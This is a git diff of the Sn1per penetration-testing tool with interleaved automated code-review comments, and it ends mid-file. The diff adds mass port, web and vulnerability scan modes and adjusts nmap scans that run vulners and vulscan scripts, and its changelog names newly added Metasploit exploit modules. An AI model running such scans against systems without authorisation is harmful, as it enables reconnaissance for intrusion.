diff --git a/CHANGELOG.md b/CHANGELOG.md index 460f2424..95456c02 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,4 +1,21 @@ ## CHANGELOG: +* v7.2 - Added experimental OpenVAS API integration +* v7.2 - Improved Burpsuite 2.x API integration with vuln reporting +* v7.2 - Added hunter.io API integration to recon mode scans +* v7.2 - Added Cisco IKE Key Disclosure MSF exploit +* v7.2 - Added JBoss MSF vuln scanner module +* v7.2 - Added Apache CouchDB RCE MSF exploit +* v7.2 - Added IBM Tivoli Endpoint Manager POST Query Buffer Overflow exploit +* v7.2 - Added Java RMI MSF scanner +* v7.2 - New scan mode "vulnscan" +* v7.2 - New scan mode "massportscan" +* v7.2 - New scan mode "massweb" +* v7.2 - New scan mode "masswebscan" +* v7.2 - New scan mode "massvulnscan" +* v7.2 - Added additional Slack API notification settings +* v7.2 - Improved NMap port detection and scan modes +* v7.2 - Fixed issue with Censys API being enabled by default +* v7.2 - Fixed verbose errors in subjack/subover tools * v7.2 - Fixed issue with NMap http scripts not working * v7.1 - Added KeepBlue CVE-2019-0708 MSF scanner * v7.1 - Added automatic workspace generation for single target scans diff --git a/README.md b/README.md index 0da84dd0..8f1070bf 100644 --- a/README.md +++ b/README.md @@ -60,6 +60,7 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. - [x] Create individual workspaces to store all scan output ## EXPLOITS: +- [x] Cisco IKE PSK Disclosure - [x] Drupal RESTful Web Services unserialize() SA-CORE-2019-003 - [x] Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts - [x] Drupal: CVE-2018-7600: Remote Code Execution - SA-CORE-2018-002 
@@ -72,6 +73,7 @@ To obtain a Sn1per Professional license, go to https://xerosecurity.com. - [x] Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) - [x] Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 - [x] ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 +- [x] MS15-034 HTTP.sys Memory Leak - [x] Shellshock Bash Shell remote code execution CVE-2014-6271 - [x] HeartBleed OpenSSL Detection CVE-2014-0160 - [x] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) @@ -104,7 +106,7 @@ bash install.sh ## UBUNTU/DEBIAN/PARROT INSTALL: ``` -bash install_debian_ubuntu.sh +sudo bash install_debian_ubuntu.sh ``` ## DOCKER INSTALL: diff --git a/modes/discover.sh b/modes/discover.sh index f70478e7..c8a9cf63 100644 --- a/modes/discover.sh +++ b/modes/discover.sh @@ -14,9 +14,9 @@ if [ "$MODE" = "discover" ]; then mkdir $LOOT_DIR/output 2> /dev/null mkdir $LOOT_DIR/scans 2> /dev/null fi - OUT_FILE=$(echo "$TARGET" | tr / -) + OUT_FILE="$(echo $TARGET | tr / -)" echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null - echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi 
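Review bot: The rewritten `OUT_FILE` assignment in the discover.sh hunk drops the quotes around `$TARGET` inside the command substitution, so a target containing whitespace or glob characters is word-split and pathname-expanded before `tr` ever sees it; the second discover.sh hunk (`@@ -38,7 +38,7`) introduces the same unquoted `echo $TARGET`. The outer quotes added here are harmless but the inner ones are the ones that matter: `OUT_FILE="$(echo "$TARGET" | tr / -)"`, or with no subprocess at all, `OUT_FILE="${TARGET//\//-}"`. The `$OUTFILE` → `$OUT_FILE` correction on the following line is right, though that line and the `tasks.txt` line still leave `$LOOT_DIR` and `$OUT_FILE` unquoted in their redirect targets. The enclosing `if [ "$MODE" = "discover" ]` block starts and ends outside the hunk.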
@@ -38,7 +38,7 @@ if [ "$MODE" = "discover" ]; then
 echo -e "$OKRED ____ / /"
 echo -e "$OKRED \/$RESET"
 echo ""
- OUT_FILE=$(echo "$TARGET" | tr / -)
+ OUT_FILE=$(echo $TARGET | tr / -)
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -47,12 +47,17 @@ if [ "$MODE" = "discover" ]; then
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- nmap -T4 -v -p $QUICK_PORTS -sS $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
+ nmap -v -p $QUICK_PORTS -sS $TARGET -Pn 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
 cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
 echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ nmap -v -p $DEFAULT_UDP_PORTS -sU -Pn $TARGET 2> /dev/null | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null
+ cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt
+ echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED CURRENT TARGETS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
+ cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
 sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
 cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
 echo ""
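Review bot: The new UDP block is a verbatim copy of the TCP block above it, and both recover host addresses by scraping nmap's verbose stdout with `cat … | grep open | grep on | awk '{print $6}'`, which only works as long as the wording and field order of the "Discovered open port" progress lines stay the same. nmap's grepable output is the stable interface for this — add `--open -oG $LOOT_DIR/ips/sniper-$OUT_FILE-udp.gnmap` to the scan and extract hosts with `awk '/Ports:/ {print $2}'` — and the two scan-and-extract sequences are worth folding into one function parameterised on the protocol flag and file suffix. Separately, the TCP scan now passes `-Pn` and drops `-T4`, so every address in a discovery range is port-scanned as if up, and the added `-sU -Pn` sweep is run on the same terms; against large ranges that can extend the run considerably, so the `-Pn` lines deserve a comment saying the trade-off is deliberate. The enclosing `if [ "$MODE" = "discover" ]` block continues outside the hunk.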
diff --git a/modes/flyover.sh b/modes/flyover.sh index 88d1a1af..727280a6 100644 --- a/modes/flyover.sh +++ b/modes/flyover.sh @@ -64,7 +64,7 @@ if [ "$MODE" = "flyover" ]; then webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null & webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null & - nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & + nmap -sS --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null & cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null diff --git a/modes/fullportonly.sh b/modes/fullportonly.sh index 77b13a1d..9b5be0b1 100644 --- a/modes/fullportonly.sh +++ b/modes/fullportonly.sh 
@@ -32,7 +32,7 @@ if [ "$MODE" = "fullportonly" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -vv -sT -sV -O -A -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null 
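Review bot: The new nmap invocation spells the same request three ways — `-A` already enables OS detection and version detection, so `-sV -A -O` is equivalent to `-A` alone; the same `-v -sV -A -O` form appears in the single-port TCP branch of the next fullportonly.sh hunk (`@@ -40,21 +40,21`) and in fullportscan.sh (`@@ -9,7 +9,7`). Dropping `-sT` also changes the scan type from an explicit connect scan to nmap's default (SYN when running as root, connect otherwise), which is reasonable but is exactly the kind of change that should get a one-line comment above the call, e.g. `# scan type left to nmap's default: SYN as root, connect otherwise`. The enclosing `if` block starts and ends outside the hunk.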
@@ -40,21 +40,21 @@ if [ "$MODE" = "fullportonly" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET + nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml -p $DEFAULT_UDP_PORTS $TARGET sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e 
"${OKGREEN}====================================================================================${RESET}" - nmap -Pn -A -v -sV -T4 -sU --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -A -v -sV -sU --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $PORT -Pn -oX $LOOT_DIR/nmap/nmap-$TARGET-udp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null fi @@ -66,6 +66,7 @@ if [ "$MODE" = "fullportonly" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" fi + if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi diff --git a/modes/fullportscan.sh b/modes/fullportscan.sh index 4f13abcc..dd8f7b85 100644 --- a/modes/fullportscan.sh +++ b/modes/fullportscan.sh 
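Review bot: In the single-port TCP branch the rewritten line drops `-Pn` (old: `nmap -Pn -A -v -sV -T4 …`, new: `nmap -v -sV -A -O …`), while the UDP line directly below keeps it — twice, `-Pn … -p $PORT -Pn`. A host that does not answer host-discovery probes will now be skipped by the TCP scan but still scanned over UDP, which is an inconsistent and presumably unintended change; restore it as `nmap -Pn -v -sV -A -O --script=… -p $PORT -oX …` and delete the duplicated `-Pn` on the UDP line. The enclosing `if`/`else` starts outside the hunk.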
@@ -9,7 +9,7 @@ else if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per full portscan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi - nmap -vv -sT -sV -O -A -T4 --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET + nmap -v -sV -A -O --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET cp -f $LOOT_DIR/nmap/nmap-$TARGET-fullport.xml $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null @@ -20,7 +20,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -Pn -sU -sV -A -T4 -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp + nmap -Pn -sU -sV -A -v --script=/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners -p $DEFAULT_UDP_PORTS -oX $LOOT_DIR/nmap/nmap-$TARGET-fullport-udp.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET-udp sed -r "s/ /dev/null > $LOOT_DIR/nmap/nmap-$TARGET-udp.txt 2> /dev/null rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then diff --git a/modes/massportscan.sh b/modes/massportscan.sh new file mode 100644 index 00000000..9a4e29c6 --- /dev/null +++ b/modes/massportscan.sh 
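Review bot: In the UDP hunk (`@@ -20,7 +20,7`) the scan's raw output is written to `$LOOT_DIR/nmap/nmap-$TARGET-udp` by `tee`, but the cleanup line two below it removes `$LOOT_DIR/nmap/nmap-$TARGET` instead, so the unfiltered UDP file is left behind on every run; the fullportonly.sh counterpart gets this right with `rm -f $LOOT_DIR/nmap/nmap-$TARGET-udp 2> /dev/null`. That `rm` line is context here, but since the commit touches the adjacent command it is the natural place to fix it. The redundant `-sV -A -O` in the first hunk is the same point raised on fullportonly.sh.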
@@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massportscan" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m fullportonly --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! 
-z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/massvulnscan.sh b/modes/massvulnscan.sh new file mode 100644 index 00000000..07eeabd0 --- /dev/null +++ b/modes/massvulnscan.sh 
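Review bot: `for a in \`cat $FILE\`` splits the whole target file on IFS and glob-expands every resulting word, and `sniper $args` re-splits a string assembled by concatenation, so any target line with whitespace or a glob character is mangled before the child `sniper` sees it; massvulnscan.sh, massweb.sh and masswebscan.sh contain the identical loop. Read the file line by line and keep the arguments in an array (sketch below; the logging `echo` then uses `${args[*]}`). Two further points: the scan loop only runs when `$REPORT` is `1`, so a `--noreport` invocation sends the "Finished" Slack message without scanning anything — if that is intended it needs a comment, otherwise an `else` branch is missing; and the header comment says `# MASSWEB MODE` in all four new files, so this one should read `# MASSPORTSCAN MODE`.

```shell
while IFS= read -r a || [ -n "$a" ]; do
  [ -z "$a" ] && continue
  args=()
  if [ -n "$WORKSPACE" ]; then
    args+=(-w "$WORKSPACE")
    # … unchanged: workspace directory setup …
  fi
  args+=(-m fullportonly --noreport --noloot)
  TARGET="$a"
  args+=(-t "$TARGET")
  # … unchanged: banner, tasks.txt and per-scan log lines (use "${args[*]}" in the echo) …
  sniper "${args[@]}" | tee "$WORKSPACE_DIR/output/sniper-$TARGET-$MODE-$(date +"%Y%m%d%H%M").txt" 2>&1
  # … unchanged: else branch writing to $LOOT_DIR/output …
done < "$FILE"
```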
@@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m vulnscan --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! 
-z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/massweb.sh b/modes/massweb.sh new file mode 100644 index 00000000..2e71936c --- /dev/null +++ b/modes/massweb.sh 
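Review bot: The guard on the second line of this new file tests `[ "$MODE" = "massweb" ]`, but the file implements the `massvulnscan` mode (its inner call is `-m vulnscan`), so `-m massvulnscan` never enters this block; and because massweb.sh and masswebscan.sh test the same string, three files now claim the `massweb` mode and, each ending in `exit`, whichever is sourced first presumably wins. Change it to `if [ "$MODE" = "massvulnscan" ]; then` and the header to `# MASSVULNSCAN MODE`; masswebscan.sh (its `@@ -0,0 +1,71 @@` hunk below) has the same slip and should test `masswebscan`. The CHANGELOG lists both as distinct new modes, so this looks like a copy-paste leftover rather than an intended alias.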
@@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m web --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! 
